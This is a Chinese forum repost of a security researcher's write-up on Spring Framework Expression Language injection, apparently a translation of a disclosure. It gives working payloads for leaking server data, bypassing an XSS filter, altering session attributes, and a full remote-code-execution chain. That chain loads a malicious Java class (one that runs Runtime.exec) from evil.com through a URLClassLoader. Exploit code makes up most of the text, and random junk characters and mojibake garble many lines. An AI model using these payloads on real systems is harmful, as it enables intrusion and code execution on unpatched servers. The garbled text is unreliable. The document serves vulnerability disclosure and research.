中国网络渗透测试联盟

标题: spring-远程代码注入 [打印本页]

作者: admin    时间: 2013-2-16 21:47
标题: spring-远程代码注入
Remote Code with
( Q4 h1 L  I! C5 s4 uExpression Language Injection
! u& Z7 A9 V5 X- _Spring Framework脆弱性—DanAmodio% P! j6 A; A' y. q1 M* F" `
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中: Q- B+ H6 ~- c; ?" K, ]
可能会存在风险。
. Z; G  r  q2 ?! z8 k2 f; N在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的
! \; f8 t$ ]& p7 O3 F4 N9 K( R0 qArshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可& C  C9 p  Q, T! M' k: U( @; D( ?# A
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
& y; Z7 `3 }$ N7 c" K  A以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
' W8 q  c" b# K+ ~5 L. S版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。8 P9 _0 Q" \4 `4 h1 e. S+ f
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
( q: Y8 |9 ]7 l- a- v9 ^我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版9 R7 l9 W  j; k8 _  V' D  [# u
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
& a0 |% q' r/ c; j, R0 M6 T; {; R这些版本不支持禁用double EL resolution.
4 e9 V9 b. \1 C% ]$ l2 G8 U这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含; P( i; e5 E# ~
EL2.2容器上可能进行远程代码执行。4 R- `+ P$ }& C! c7 F7 [
这是一个原始信息泄露的攻击例子:5 s* _" J! M2 g- q, @
请求:
$ x7 t2 y; {1 p( Gttp://vulnerable.com/foo?message=${applicationScope}
6 P% R7 ?; \6 ]  n. b4 `到达以下内容页面:6 a6 p3 J6 f* y' S# u
结果将输出一些包含内部服务器信息calsspath 和本地工作目录
1 F, z1 }" b* \  t' W" m. u你也可以做一些其他事情,如这样:9 b3 b( B6 a3 K5 {$ e4 P6 j
${9999+1}' [( e; X; @( Q2 Z
还可以访问session 对象和beans2 w. f, ?& `3 ]3 s
${employee.lastName}7 Y/ ^! M. J0 t3 G2 I1 h) K
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
  x; S2 S8 o2 FEL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
  i2 s/ u* H9 I, C西,比如XSS.
/ _/ @  s0 r. L# q( V& x哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签
" i7 Z; H4 y% g2 o, D突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
; B/ F- v( w+ d/ R呢?”2 |) g: D/ v. f6 r  n
因此,我尝试巳缦拢�% h) I$ P$ D2 G0 I+ f+ L* E4 Y( v
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
4 n+ L" o5 }; O( I" t% `P% C2 }% u4 I6 Y
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
8 x1 r2 v2 H; O2 k- P回的文本被插入进了spring:message 标签。
" U0 K! @1 E" r# {  g这里是一个最终绕过过滤的实例:
- Z. K: m9 W( Shttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1)/scriptQ4 A/ A0 |4 P  Y, ]* @
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为8 N; i  Y1 o4 q/ U
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?1 s$ m* W! N( t7 C% }8 G- G
经过一番研究,我学习到EL2.2 增加了方法调用。! B9 t1 H, V( `4 G
我写了一个快速测试应用程序代码并且检测一些功能0 e4 I1 Q9 H' {* z# Q3 \
${pageContext.request.getSession().setAttribute(“account”,”123456″)}
* k2 Y, ~, C$ V, s) n* N${pageContext.request.getSession().setAttribute(“admin”,true)}
  j* G) Z3 a) S, {) k- n好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
, q1 d5 n. a0 _指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?4 ]- K0 m/ ?- f) I
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
* D: ^* z( c$ `5 w. z4 I3 c0 e: s“, 1234)}
0 }) u' {' n% ^8 r0 `" U0 P. [${“”.getClass().forName(“java.lang.Runtime”)}6 [3 j% N: _% U. {6 g' _( u  d
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不4 R. O# z+ ^0 k# e
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函+ l" B. W# P1 t/ z* {7 h  D
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有
3 ?- ]5 g6 Q' e* q: U9 Q一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于9 o% _/ B, [6 c5 J8 I- t2 o9 s
方法签名invoke(Object obj, Object„ args)& ~8 t# U; J2 p- O
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问9 R; u) S: j8 Z/ @. K* f$ \- y
题,以让它可以工作起来。
* t7 N. u% m3 |5 `! [. G漏洞利用:0 T) e+ a' s  \. m' X
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我# v3 B" C( f4 V6 r
希望你们中的一些JAVA奇才告诉我我是如此的可笑。
' {# y* H& y$ i5 `7 ^! N+ B这里有一些我试过的失败的用例,为了试图让它工作的用例:" q2 X$ L- E& R5 r
 写文件到文件系统9 t' y/ B2 i: w0 [1 {
 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
! S- d/ G9 D) B- V( {  A我认为这些可以很好的工作,但是我不能找到合适的类来载入。- X" q& @' b3 C. L. k4 s3 }
${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}! \/ @, _- O3 m& S1 c  y) w
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
# O( i+ g4 j; |8 @. Z9 p1 ^# v, jorg.springframework.expression.spel.standard.SpelExpressionParser not found
3 |" I( P0 }+ @, _1 Qby, f0 l7 S  C( F! w9 j
org.glassfish.web.javax.servlet.jsp [194].
' n) B8 F( F8 ]# }* P0 e 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public9 p) U) L& n8 K5 H2 M
 利用反射来创建一个新的Runtime(and watch the world burn)
" z$ a4 U- r1 d${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName2 B7 y3 R% \4 C' j* y
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}; c5 k* m! T( y) p6 }, H
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
" A* r: x6 p3 ]5 ?! A, \% W 使用java.lang.ProcessBuilder3 U' T: H, q; W: P7 ~
 用表达式语言来评估表达式语言0 D$ u/ r  g/ D! g
Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.$ G4 A  H; k7 F2 Q% T4 ?
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request) r  R' w. E- r: V
“,”".getClass(),null)}
4 J2 s0 @9 V+ w, V7 W1 {; j! ] 创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
. g& F+ w+ N; [& q我在使用一个空数组通过Method.invoke()时失败了很多次1 m3 N& Z! B) \
“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo( {, C* R& @7 C0 H2 g* ~
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
; q' d6 p0 i$ @  X" d2 ArrayList”).newInstance().toArray())+ f  @9 B% a3 q( r* n! Y
java.lang.IllegalArgumentException: wrong number of arguments
3 `- S% E" l8 z, }. d: l2 g最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可! e* p& G# g) p6 a/ m0 U6 E% D
以创建一个恶意class文件并且指向类装载器.0 {+ _  C2 `. S8 J. V
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:6 h: ~. H" {% }
public class Malicious {
% i" g  j! L# i4 p2 r. Bpublic Malicious() {' O- B  R- F+ V3 Q# @1 c+ Q# w  @
try {
# ~) Q7 Y7 T0 Ljava.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac& S5 [- t2 Y4 Q; k" w: C0 G1 b
java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win& m2 [7 C' K' a% E
} catch (Exception e) {; Z) r, C9 {. F. ~9 ]- X
}& V1 ?) L5 ~! P' @2 J1 I# y
}; q. R" Y5 r4 g& }" t, f
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
7 J9 M2 `0 ?1 E7 R  Q6 Z# e话中,因此它可以被使用.
9 i- |4 h" E1 K! E. m${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName5 t# B& g/ d1 O4 L& j* H* Q
(“java.util.ArrayList”).newInstance())}1 A, x; B# r/ M( t7 m. M. s5 V: Q5 q
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
$ P, X$ m- f5 A: z  ~! r2 K( P一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
2 X+ x, v9 g/ ggetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个( H4 u- d' I+ {( s" o
我们可以调用的create(string)方法,然后转换对一个URL对象。* T) R- N3 ?+ N3 G: J: j
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
# V9 t0 F3 Z, C: ^ere/malicious/classfile/is/located/”).toURL())}
1 t. B, z, r9 x/ n0 z* Y然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
8 N4 G5 u; a2 f/ ^& ?恶意类文件被装载并创建,触发远程代码.
: C! `% x2 r  a2 i) }( `! D1 P${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte5 C+ V3 p- ?3 F& e+ i
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
0 _6 h4 E. j+ [! x8 l+ _getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance( E  {; k5 c* _1 H
()}




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2